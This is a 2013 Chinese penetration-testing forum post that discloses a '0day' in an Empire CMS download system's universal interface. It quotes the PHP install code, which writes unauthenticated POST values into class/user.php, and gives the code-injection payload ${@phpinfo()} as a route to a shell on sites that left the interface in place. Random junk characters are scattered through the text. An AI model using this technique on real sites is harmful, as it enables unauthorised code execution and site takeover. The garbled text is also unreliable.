中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin 时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们- m9 k7 j  d8 s! M! V- Y
8 A3 b' U8 C4 Q

- F& X7 u' I- o/ Z6 k7 A这是帝国的一套下载系统如图5 l7 @3 n' V+ t& F$ v, W+ Q1 ~
ps(不需要任何账户和密码，直接写shell)
$ J# q" `1 \9 i  E9 G: f9 n
由于很多站是由于下载要整合discuz 等等一些论坛...." f6 }  F( ~* F, b6 G: i1 E6 W

) ~5 f6 Z6 ?# O2 U& S5 f! N
而帝国他又有一个万能接口，如图
( A5 T" R2 Z6 J* u8 ]
[attach]170[/attach]. H2 [0 |' @: T& K9 H

' i; p4 F! r$ J) L0 {% k+ ]' A* }而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码
# Z* i/ U4 }( M# z% e3 U3 M& f! R
( e- O& z, i9 {当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪
7 M/ b3 X$ L3 O: g- @7 s/ k( N/ v( F) E1 W! l2 F
在data/fun.php中的15行
% {% a- X' E- e$ l
5 m0 s- N: L# ?我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {2 U1 g7 s0 L% y& }

17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干0 @' {7 L* G- O4 e- A, l: |4 M% r

( e9 t1 ]# p  F" Q" |% c3 Z这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);# w: a/ i4 j( A2 L! x$ M
1 n* g& G+ s' U# D+ H6 O
他将传进来的变量进行了切割，然后赋给了$filetext- H8 h0 Z( V6 {. U+ }
1 H. [% v1 z" p' i& T. v# B6 D. P
然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了
/ ~& P! `6 {- q6 V1 J
+ q, p4 i$ ~$ H% |* k* _9 E" i1 ]我们看看写入的结果，随便填一个

3 I: l; d" `( c3 S[attach]171[/attach]& _0 i" c5 U: u) W+ w- X3 E

: t& _6 a; d. K! i) X' Q: {  V5 {' w4 {( }" s) h" R
[attach]172[/attach]2 q8 W6 ?) P" T3 z& T! c

5 e& P; p: ~  V/ b+ e5 o
) ^# {6 I* V* B) Y! H
/ M0 q! E+ M3 [, o! ~( |5 m$ ^( H* B" M: g% c( e

5 A8 J1 M3 Q- u
, w# y' U! O1 v, T# w- |1 M: |6 P
9 W! t8 l& M# _" m) T

) V- d& d  ]; w5 }[attach]173[/attach]( N1 b4 C+ L6 ~. `0 P
4 M0 v1 k$ S5 ~' z9 c1 t7 ?4 _

# `0 I$ B2 L1 P8 _
& q# j" Z) S- b+ {5 Y4 L+ M5 |! U! R, \9 V( j( B
2 `  F4 i! `3 m& r. @
[attach]174[/attach]5 I5 ?3 E# ?1 D4 v6 s

; I/ w+ N/ H! t; y' ]" a
所以我们淫荡点，写个${@phpinfo()}试试

: z( @" J3 k7 C4 ~  c
然后访问以下class/user.php这个文件8 u  F& I6 y- v% B; p
日了吧
$ t% g, A, y, _: V
5 E* @/ M& I2 h" F. {" b2 u

3 ], z: U+ w. B
( l) o( Q+ u, D8 s  I6 D6 @
5 Y1 I9 S' S$ {  t, s) n" B7 V

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)